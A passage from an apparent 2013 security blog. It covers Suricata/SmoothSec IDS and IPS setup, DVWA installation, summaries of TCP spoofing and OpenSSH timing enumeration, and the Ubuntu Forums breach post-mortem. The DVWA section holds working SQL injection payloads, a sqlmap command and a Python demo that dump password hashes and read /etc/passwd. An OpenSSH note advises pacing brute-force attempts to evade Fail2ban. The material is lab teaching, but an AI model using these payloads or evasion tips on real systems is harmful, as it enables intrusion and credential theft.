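alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"SAMPLE SMB exploit attempt"; reference:cve,2008-4250; reference:url,technet.microsoft.com/security/bulletin/ms08-067; sid:2210000; rev:3;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"SAMPLE chatty client policy"; sid:2210010; rev:1;)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"SAMPLE web app overflow"; reference:bugtraq,12345; sid:2210050; rev:2;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"SAMPLE same-IP scan"; reference:cve,2012-0001; sid:2100527; rev:1;)
# comment lines are passed through untouched
"""

# Patterns written against the "reference:" keyword as it appears in rule
# files (assumption: PulledPork's own cve:/bugtraq:/MS tokens end up matching
# the same text).  Matched case-insensitively because Microsoft bulletin
# references usually appear as lowercase URLs.
DROP_PCRES = (
    r"ms(0[0-9]|1[0-9])-\d+",
    r"reference:bugtraq,\d+",
    r"reference:cve,20[0-9][0-9]-\d+",
)

SID_RE = re.compile(r"\bsid:\s*(\d+)\s*;")
GID_RE = re.compile(r"\bgid:\s*(\d+)\s*;")


def parse_sid_spec(spec):
    """'1:2210000-1:2210049,1:2100527' -> [(gid, lo, hi), ...]."""
    ranges = []
    for tok in spec.split(","):
        tok = tok.strip()
        if not tok:
            continue
        lo, _, hi = tok.partition("-")
        gid, sid = (int(x) for x in lo.split(":"))
        hi_sid = int(hi.split(":")[1]) if hi else sid
        ranges.append((gid, sid, hi_sid))
    return ranges


def rule_ids(line):
    """(gid, sid) of a rule line, or None for comment and blank lines."""
    m = SID_RE.search(line)
    if not m:
        return None
    g = GID_RE.search(line)
    return (int(g.group(1)) if g else 1, int(m.group(1)))


def apply_policy(rules_text, disable_spec="", drop_pcres=DROP_PCRES):
    """Comment out disabled SIDs and flip matching alert rules to drop.
    A SID that is both disabled and matched by a pattern stays disabled."""
    disabled = parse_sid_spec(disable_spec)
    patterns = [re.compile(p, re.IGNORECASE) for p in drop_pcres]
    out = []
    for line in rules_text.splitlines():
        ids = rule_ids(line)
        active = line.lstrip().startswith(("alert ", "drop "))
        if ids is None or not active:
            out.append(line)
            continue
        gid, sid = ids
        if any(g == gid and lo <= sid <= hi for g, lo, hi in disabled):
            out.append("# " + line)
        elif any(p.search(line) for p in patterns):
            out.append(re.sub(r"^(\s*)alert\b", r"\1drop", line))
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def rule_states(rules_text):
    """sid -> 'alert' | 'drop' | 'disabled', for checking the result."""
    states = {}
    for line in rules_text.splitlines():
        ids = rule_ids(line)
        if ids is None:
            continue
        stripped = line.lstrip()
        states[ids[1]] = ("disabled" if stripped.startswith("#")
                          else stripped.split()[0])
    return states


def demo(disable_spec="1:2210000-1:2210049"):
    """The text's range plus the dropsid patterns, applied to the sample."""
    return rule_states(apply_policy(SAMPLE_RULES, disable_spec))


if __name__ == "__main__":
    for sid, state in sorted(demo().items()):
        print(sid, state)
```

After the real update, confirm on the sensor that rules actually changed state: count the lines beginning with drop in the rules directory (grep -c '^drop' /etc/suricata/rules/*.rules) and check that the disabled SIDs are commented out. A count of zero means the dropsid pattern did not match the way references are written in the rule files and needs adjusting.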

(D) Troubleshooting

(1) If the events show no GeoIP information, check whether "snorby-geoip.dat" exists in /var/www/snorby/config/. If it is missing, the box had no internet connection while Snorby was installed; download it with the following commands.

cd /tmp/
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
gzip -d GeoIP.dat.gz
mv GeoIP.dat /var/www/snorby/config/snorby-geoip.dat
# set ownership on the installed copy (a cp after chown would leave the copy owned by root)
chown www-data:www-data /var/www/snorby/config/snorby-geoip.dat


(2) If no events are captured, make sure each physical port is cabled to the interface name you expect (eth0, eth1 and eth2). Compare the MAC address printed on each card with the MAC address ifconfig shows for each interface to determine which name belongs to which card.

(E) Performance

This SmoothSec is installed on low-end hardware (Intel Atom D510 CPU with Realtek Gigabit NICs). It also sits behind a router running Untangle (same Intel Atom D510 CPU with Realtek Gigabit NICs). Untangle is a UTM (Unified Threat Management system) that blocks some malicious traffic, but only a little. The switch is a D-Link DGS-1008D (Home) Gigabit switch.

To test the performance, I watched YouTube at 1080p on PC-1 (via wifi), YouTube at 720p on PC-2 (via wifi) and YouTube in HD on an Android smartphone over wifi. Playback was smooth, without any lag, on all devices.

The CPU load average during the test stayed below 4.x and memory use below 3GB.

AF_PACKET is a good fit for IDS/IPS on very low-end hardware.

(F) Limitation

Since SmoothSec 3.2 is built on Debian 7.0 (Wheezy), the system breaks if you upgrade it to Sid (Unstable): the newer Apache (2.4.x) and Perl refuse to run. So once you have installed the newer kernel (needed for AF_PACKET), comment out the repositories you added so the system is not upgraded to Sid by accident.

Another limitation is that at least 3 NICs are required for IDS or IPS.

Snorby also cannot show dropped traffic at the moment.

Known Issue

Pigsty crashes randomly; when it does, nothing new shows up in Snorby. The problem has been reported (see here). The workaround is a bash script, run from cron every 5 minutes, that restarts Pigsty when its log shows an error and no Pigsty process is running (make both scripts executable with chmod +x).

nano /root/chkpigstylog

#!/bin/bash
# Restart Pigsty if pigsty.log contains "Error: " and no Pigsty process is running.
# The process check matters: the error line stays in the log, so without it a
# new Pigsty daemon would be started every 5 minutes.
STRING="Error: "
if grep -q "$STRING" /var/log/pigsty.log && ! pgrep -f /usr/local/bin/pigsty > /dev/null
then
   /root/runpigsty
fi


nano /root/runpigsty

#!/bin/bash
# Start Pigsty as a daemon, feeding Suricata's unified2 output for sensor "Suricata" on eth0.
# The file pattern is quoted so the shell does not try to expand it.
/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i eth0 -n "Suricata" -d /var/log/suricata/ -m 'unified2.alert.*' -D


crontab -e
*/5 * * * * /root/chkpigstylog


Update

The developers have since fixed the problem. Upgrade Pigsty with the following commands :

npm update pigsty-mysql -g
npm update pigsty -g


That's all! See you.

Monday, August 26, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Prevention System (IPS)

I am going to show you how to build an affordable Intrusion Prevention System (IPS) for home, SOHO or small business use. With Suricata's default settings, SmoothSec on the hardware below is not good enough even for YouTube at 360p. Once tuned, it can handle YouTube at 720p over a 10Mb internet connection: still some lag, but watchable. Note that the connection also passes through a router (Untangle, on the same motherboard, CPU and RAM).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (100Mbps, up to 200Mbps full-duplex)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta no longer exists; download version 3.2 from the official site (here). The beta and the official release are the same.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Cards 0 and 1 will be bridged, while Network Card 2 will be the management interface.

Step 1 :

First, connect only SmoothSec's Network Card 2 to the switch and leave Network Cards 0 and 1 disconnected: the management interface needs internet access for the installation.

Step 2 (IDS Mode) :

Install SmoothSec as usual. When prompted to install non-free network interface firmware, skip it. After installation the box reboots.

Log in as "root" with the default password "toor", and change that password (passwd) before the box goes into service.

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

* or whatever your network subnet is.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Choose "None of the above" and then "UTC"; otherwise Snorby reports wrong timestamps.

nano /var/www/snorby/config/snorby_config.yml

Make sure "timezone_search: false" is set under "production:".

Make sure "time_zone: 'UTC'" is commented out.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment out all the eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where "address" is the SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once it has booted, go to one of the personal computers and browse to "https://192.168.0.120". Then set the time zone and your report email address.

Step 6 (IPS Mode):

Run the box in IDS mode for at least a day before switching it to IPS (inline) mode with the steps below; otherwise Snorby cannot capture the traffic.

Suricata

nano /etc/suricata/suricata.yaml

Locate "rule-files:" and append "- local.rules" under "- emerging.rules".

cd /etc/suricata/rules

touch local.rules

* you can add your own rules to "local.rules". After adding them, restart Suricata (command below).

Locate "nfq:" and uncomment every item in that section except "# fail-open: yes", which requires Linux kernel 3.6 or greater.

/etc/init.d/suricata restart

* you need to wait for several minutes before the box can be connected to internet.

PulledPork

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9])-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

* to switch every rule that references a vulnerability report (CVE, Bugtraq or Microsoft bulletin) from alert to drop. Expect some false positives to block legitimate traffic, so review the drops.

IPtables

Add the following lines above "exit 0" at "/etc/rc.local" :

nano /etc/rc.local

iptables -A INPUT -i br0 -j NFQUEUE --queue-balance 0:3
iptables -A OUTPUT -o br0 -j NFQUEUE --queue-balance 0:3
iptables -A FORWARD -i br0 -o br0 -j NFQUEUE --queue-balance 0:3

* note that I have a quad-core CPU, hence queues 0 to 3. If you have 8 cores, "--queue-balance" becomes "0:7".

Suricata Startup Script

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D"

Replace with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -q0 -q1 -q2 -q3 -D"

Locate "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i $INTERFACES -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"

Replace with "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i br0 -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"


* do this for both occurrences, as the file has 2 entries.
** with an 8-core CPU, use "-q0 -q1 -q2 -q3 -q4 -q5 -q6 -q7".

Then reboot your box. Please note that you are required to wait for several minutes before you can connect to the internet.

Step 7:

To update SmoothSec, run the following commands (they can be saved as a script). The rules are updated automatically early every morning.

#!/bin/bash
# Update Debian packages, the SmoothSec scripts, Snorby, Pigsty and the Suricata rules.
set -e
apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update


Step 8 (Suricata Tuning) :

nano /etc/suricata/suricata.yaml

Change "max-pending-packets:1024" to "max-pending-packets: 65000".

Locate "detect-engine" and change "- profile: medium" to "- profile: high".

Locate "mpm-algo: ac" and insert "detect-engine.sgh-mpm-context: full" above "mpm-algo: ac".

Then restart the Suricata. Please wait for several minutes before you can connect to the internet.

/etc/init.d/suricata restart

Known Issue

(1) Remember that your box is in the UTC time zone.
(2) You may need to disable rule 1:2100527 (same-IP scanning/connection) in "/etc/pulledpork/suricata/disablesid.conf". After that, run "smoothsec.suricata.rules.update" so PulledPork applies the change, and restart Suricata.
(3) If you use another pattern matcher (b2g, b3g, wumanber) instead of ac, you will need more than 4GB RAM.
(4) With ac as pattern matcher, 4GB of memory and an Intel Atom D510 CPU, you will see lag while watching YouTube (720p) with about 20,000 active rules.
(5) If you have an nVidia display card (with the nVidia and CUDA drivers installed), you can compile Suricata with "--enable-cuda --enable-nfqueue" and set "mpm-algo: b2g_cuda" in "/etc/suricata/suricata.yaml". You should have more than 4GB of memory; the rest of the setup is the same as above.


Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(this last command is invalid for Snorby version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
Suricata Performance Tuning
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 22, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Detection System (IDS)

I am going to show you how to build an affordable Intrusion Detection System (IDS) for home, SOHO or small business use. I will write another article later about building an Intrusion Prevention System (IPS).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (100Mbps, up to 200Mbps full-duplex)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta no longer exists; download version 3.2 from the official site (here). The beta and the official release are the same.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Cards 0 and 1 will be bridged, while Network Card 2 will be the management interface.

Step 1 :

First, connect only SmoothSec's Network Card 2 to the switch and leave Network Cards 0 and 1 disconnected: the management interface needs internet access for the installation.

Step 2 :

Install SmoothSec as usual. When prompted to install non-free network interface firmware, skip it. After installation the box reboots.

Log in as "root" with the default password "toor", and change that password (passwd) before the box goes into service.

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

* or whatever your network subnet is.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Choose "None of the above" and then "UTC"; otherwise Snorby reports wrong timestamps.

nano /var/www/snorby/config/snorby_config.yml

Make sure "timezone_search: false" is set under "production:".

Make sure "time_zone: 'UTC'" is commented out.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment out all the eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where "address" is the SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once it has booted, go to one of the personal computers and browse to "https://192.168.0.120". Then set the time zone and your report email address.

Step 6:

To update SmoothSec, run the following commands (they can be saved as a script). The rules are updated automatically early every morning.

#!/bin/bash
# Update Debian packages, the SmoothSec scripts, Snorby, Pigsty and the Suricata rules.
set -e
apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update

Known Issue

None, other than remembering that your box is in the UTC time zone.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(This last command is invalid for Snorby version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 15, 2013

Quick Blind TCP Connection Spoofing with SYN Cookies

Various Linux distributions, including Ubuntu and Debian, enable TCP SYN cookies by default as a defence against SYN-flooding DoS attacks.

However, this defence mechanism can itself be turned into an attack. Jakob Lell developed a PoC exploit and tested it: with a 3-year-old notebook (HP 6440b, i5-430M CPU, Marvell 88E8072 gigabit NIC) as the client and a desktop computer as the server, he got roughly one successfully spoofed connection every 10 minutes. Over a 10.5-hour overnight run, 64 connections were spoofed.

He also stated that the attack may still succeed when TCP SYN cookies are not enabled, but it takes more time.

Consider what happens when an attacker can spoof a TCP connection from an address a service trusts. A blind spoofed connection to SSH does not get the attacker past SSH authentication, which does not rely on the source address; but any service that grants access by source IP alone, such as a firewall rule or a TCP-wrappers allow-list for a known host, can be reached as that host, even though the attacker never sees the replies.

Reference

[1] Full Disclosure
[2] Jakob Lell's Blog

That's all! See you.

Saturday, August 10, 2013

OpenSSH Time Brute Force

In 2006 a bug report was filed about timing-based user enumeration against OpenSSH. The OpenSSH developers stated that it is not a bug and that they would not fix it.

When brute-forcing an OpenSSH account, the attacker sends a very long password (around 39,000 characters). If the account exists, the response takes noticeably longer than for a non-existent one, because the daemon typically only runs the expensive password hash over that input for a real user.

TurboBorland developed a Proof-of-Concept (PoC) for this.

He stated that he could not reproduce it on a local network but that it worked perfectly over the internet. I did not test it myself; if you are interested, try it.

If the target runs Fail2ban, space out the attempts to avoid being blocked or banned.

That's all! See you.

Thursday, August 08, 2013

HOWTO : Enable TLS/1.1 on Firefox 23.0

Firefox 23.0 has been released. It supports TLS 1.1, but TLS 1.1 is not enabled by default. Hugo Leisink, the developer of the Hiawatha web server, suggests enabling it by setting security.tls.version.max to 2.

Since security.tls.version.min in Firefox 23.0 is 0, the browser still falls back to an older protocol version when the web server does not support TLS 1.1, so enabling TLS 1.1 breaks nothing. (That same fallback is what protocol-downgrade attacks rely on; raising security.tls.version.min is the actual hardening step, at the cost of compatibility with old servers.)

How to enable it? Type "about:config" in the URL bar of Firefox 23.0, search for "security.tls.version.max" and change the value from 1 to 2.

Meanwhile, the Hiawatha web server already supports TLS 1.1, and it is one of the most lightweight and security-focused web servers by design.

That's all! See you.

Tuesday, August 06, 2013

Anonymity Network (Tor) has been compromised by NSA

Many Tor hidden services have disappeared since this Sunday. The founder of Freedom Hosting (which hosted a lot of hidden service servers) has been arrested and charged with running some porn sites.

The article tells you something about that. It believes that the Freedom Hosting servers were compromised by the FBI using malicious JavaScript.

However, Cryptocloud found that the JavaScript was planted by the National Security Agency (NSA).

It is true that the Tor network can be monitored by the NSA.

If you use the Tor network, make sure you run the latest versions of Firefox and Tor, and use NoScript (a Firefox addon) to block JavaScript and Flash. Do not use an outdated Firefox such as the one in the Tor Browser Bundle.

Or you can consider using my project, NightHawk, which comes with the latest versions of Firefox and NoScript.

That's all! See you.

Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

99 or 1=1
- displays all records

99 or 1=1 union select 1,2,3
- displays the error "The used SELECT statements have a different number of columns", so the query does not return 3 columns

99 or 1=1 union select 1,2
- no error, displays all records: the query returns 2 columns

99 or 1=1 union select null,null
- no error, displays all records

99 or 1=1 union select version(),database()
- displays the MySQL version and the database name, dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- displays the current database user

99 or 1=1 union select null, table_name from information_schema.tables
- displays all table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- displays the column list of the users table

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- retrieves first_name and password from the users table

99 or 1=1 union select null,@@datadir
- displays the MySQL data directory

99 or 1=1 union all select null,load_file('/etc/passwd')
- displays the content of /etc/passwd (requires the MySQL FILE privilege)

Security level = medium

99 or 1=1
- displays all records

99 or 1=1 union select 1,2,3
- displays the error "The used SELECT statements have a different number of columns"

99 or 1=1 union select 1,2
- no error, displays all records

99 or 1=1 union select null,null
- no error, displays all records

99 or 1=1 union select version(),database()
- displays the MySQL version and the database name, dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- displays the current database user

99 or 1=1 union select null, table_name from information_schema.tables
- displays all table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since quotes are escaped at this level, a quoted WHERE clause cannot be used, so all column names are listed

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is the hex encoding of "users", which needs no quotes

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- retrieves first_name and password from the users table

99 or 1=1 union select null,@@datadir
- displays the MySQL data directory

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

* replace the PHPSESSID value with your own logged-in session cookie. For Security = medium the command is the same with "security=medium" in the cookie.
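The low-level walk-through above, reproduced as an added example in Python against an in-memory SQLite copy of the users table (this is not DVWA's own PHP). It assumes the id is pasted into the statement unquoted, as the payloads above imply. SQLite stands in for MySQL, so the MySQL-only steps (version(), @@datadir, load_file(), 0x hex literals, concat()) are not reproduced and || is used for concatenation. The accounts are constructed samples, hashed with unsalted MD5 as DVWA does. The column-count probe generalises the "union select 1,2,3" step into a loop, and safe_lookup shows the parameterised query that stops the injection.

```python
"""The DVWA 'low' SQL injection steps, reproduced against an in-memory
SQLite copy of the users table, next to the parameterised query that
stops them.  Added example, not DVWA's code."""
import hashlib
import sqlite3

# Constructed sample accounts (user_id -> first, last, cleartext password).
SAMPLE_USERS = {
    1: ("admin", "admin", "password"),
    2: ("Gordon", "Brown", "abc123"),
    3: ("Hack", "Me", "charley"),
}


def md5hex(text):
    """DVWA stores unsalted MD5 hashes; same here."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                "last_name TEXT, password TEXT)")
    for uid, (first, last, pw) in SAMPLE_USERS.items():
        con.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                    (uid, first, last, md5hex(pw)))
    return con


def vulnerable_lookup(con, user_input):
    """Pastes the id straight into the statement, unquoted, which is what
    the payloads in the text assume (hypothetical stand-in for DVWA's PHP)."""
    query = ("SELECT first_name, last_name FROM users WHERE user_id = "
             + user_input)
    return con.execute(query).fetchall()


def safe_lookup(con, user_input):
    """Same lookup with the value bound as a parameter.  The id is also
    type-checked, so 'or 1=1' never reaches the SQL parser."""
    try:
        uid = int(user_input)
    except ValueError:
        return []
    return con.execute("SELECT first_name, last_name FROM users "
                       "WHERE user_id = ?", (uid,)).fetchall()


def column_count_probe(con, max_cols=8):
    """The 'union select 1,2,3' step generalised: grow the column list
    until the database stops complaining, and return that count."""
    for n in range(1, max_cols + 1):
        payload = "99 union select " + ",".join(["null"] * n)
        try:
            vulnerable_lookup(con, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_credentials(con):
    """The concat(first_name,0x0a,password) step; SQLite uses || to
    concatenate.  user_id 99 does not exist, so only the union rows come back."""
    rows = vulnerable_lookup(
        con, "99 union select null, first_name || ':' || password from users")
    return sorted(r[1] for r in rows)


def demo():
    con = make_db()
    return {
        "rows_with_or_1_1": len(vulnerable_lookup(con, "99 or 1=1")),
        "columns": column_count_probe(con),
        "creds": dump_credentials(con),
        "safe_rows": len(safe_lookup(con, "99 or 1=1")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The probe stops at 2 because the page's own query selects first_name and last_name; against a real target the loop is the same, only the error text differs between database engines.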

That's all! See you!

HOWTO : Install DVWA on Ubuntu Server 12.04 LTS

Step 1 :

Download DVWA.

wget https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip

Step 2 :

Install the required packages if you did not select LAMP when installing Ubuntu Server.

sudo apt-get install apache2 mysql-server php5 unzip php5-mysql php-pear*

* remember the MySQL root password you set, e.g. dvwapass

Step 3 :

Extract DVWA. The GitHub archive unpacks into a versioned directory (DVWA-1.0.8); rename it so the paths in the following steps match.

sudo unzip v1.0.8.zip -d /var/www/
sudo mv /var/www/DVWA-1.0.8 /var/www/DVWA


Step 4 :

sudo nano /var/www/DVWA/config/config.inc.php

Change "db_password" to the MySQL root password you chose, e.g. dvwapass.

sudo nano /etc/php5/apache2/php.ini

Change "allow_url_include = Off" to "allow_url_include = On", then restart Apache (sudo service apache2 restart) so the change takes effect.

sudo chmod -R 777 /var/www/DVWA/hackable/uploads/

Step 5 :

Create Database.

mysql -u root -p
create database dvwa;
quit


Step 6 :

Point your Firefox to "http://192.168.0.10/DVWA/setup.php" to create/reset the database.

* where 192.168.0.10 is the IP address of the Ubuntu Server

Step 7 :

Then point your Firefox to "http://192.168.0.10/DVWA/index.php".

The user name is "admin" and the password is "password". DVWA is deliberately vulnerable (world-writable upload directory, allow_url_include on, default credentials), so keep it on an isolated lab network and never expose it to the internet.

That's all! See you.

Wednesday, July 31, 2013

Ubuntu Forums has been pwned! (Part 2)

Ubuntu Forums resumed finally. Congrats! The forum admin, Elfy, posted a message about the attack. I quote here for your reference.

"As announced previously, there was a security breach on the Ubuntu Forums. What follows is a detailed post mortem of the breach and corrective actions taken by the Canonical IS team. In summary, the root cause was a combination of a compromised individual account and the configuration settings in vBulletin, the Forums application software. There was no compromise of Ubuntu itself, or any other Canonical or Ubuntu services. We have repaired and hardened the Ubuntu Forums, and as the problematic settings are the default behaviour in vBulletin, we are working with vBulletin staff to change and/or better document these settings.

== What happened ==

At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.

This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.

The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.

One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.

Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.

Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the 'user' table to a file on disk which they then downloaded.

The attacker returned on 20 July to upload the defacement page.

== What the attacker could access ==

The attacker had full access to the vBulletin environment as an administrator and shell access as the 'www-data' user on the Forums app servers.

Having administrator access to the vBulletin environment means they were able to read and write to any table in the Forums database.

They used this access to download the 'user' table which contained user names, email addresses and salted and hashed (using MD5) passwords for 1.82 million users.

== What the attacker could not access ==

We believe the attacker was NOT able to escalate past the 'www-data' user (i.e. gain root) access on the Forums app servers.

We believe the attacker was NOT able to escalate past remote SQL access to the Forums database on the Forums database servers.

We believe the attacker did NOT gain any access at all to the Forums front end servers.

We believe the attacker was NOT able to gain any access to any other Canonical or Ubuntu services.

We know the attacker was NOT able to gain access to any Ubuntu code repository or update mechanism.

== What we don't know ==

We don't know how the attacker gained access to the moderator account used to start the attack.

The announcement the attacker posted was deleted by one of the Forum administrators so we don't know exactly what XSS attack was used.

== What we've done ==

Before bringing the Forums back online, we implemented a series of changes both designed to clean up after this attack and also to defend against and mitigate the fallout from possible attacks in the future.

=== Clean up ===

* We sent individual mails to all Forums users informing them of the breach and that they should consider their Forum password compromised. We advised them to change this password on any other systems where they may have re-used it.

* We backed up the servers running vBulletin, and then wiped them clean and rebuilt them from the ground up.

* We randomised all user passwords in the Forums.

* We reset all system and database passwords.

* We manually imported data into a fresh database after sanity checking each table.

=== Hardening ===

* We've removed the ability to modify or add new hooks except via root access to the database

* We've disabled all potential HTML posting avenues in the Forums for everyone but administrators.

* We've switched the Forums to use Ubuntu SSO for user authentication.

* We've implemented automated expiry of inactive moderator and administrator accounts.

* We've confined vBulletin with an AppArmor profile.

* We've reviewed and further hardened the firewalling around the Forums servers.

* We've reviewed and further hardened the PHP config on the server to close off some vectors used by the attacker.

* We've switched to forcing HTTPS for the administrator and moderator control panels and made it optionally available everywhere else

* We've improved escalation procedures for the Ubuntu Community members who graciously volunteer their time to administer and moderate the Forums.

* We will continue to work with vBulletin staff to discuss changes to the default settings which could help others avoid similar scenarios as this. The vBulletin support staff have been helpful and cooperative throughout this incident.

Finally, we'd like once again to apologize for the security breach, the data leak and downtime"


**************

After reading the above message, I think that the Ubuntu Forums are still at high risk. Why?

It seems that they found the cause of the attack and how the attacker got in. However, they did not.

They still do not know how the attacker gained access to one of the moderator accounts. SQLi? Phishing? Who knows! Since the forums changed the OpenID login logic when they were upgraded early this year, that may be one of the attack vectors.

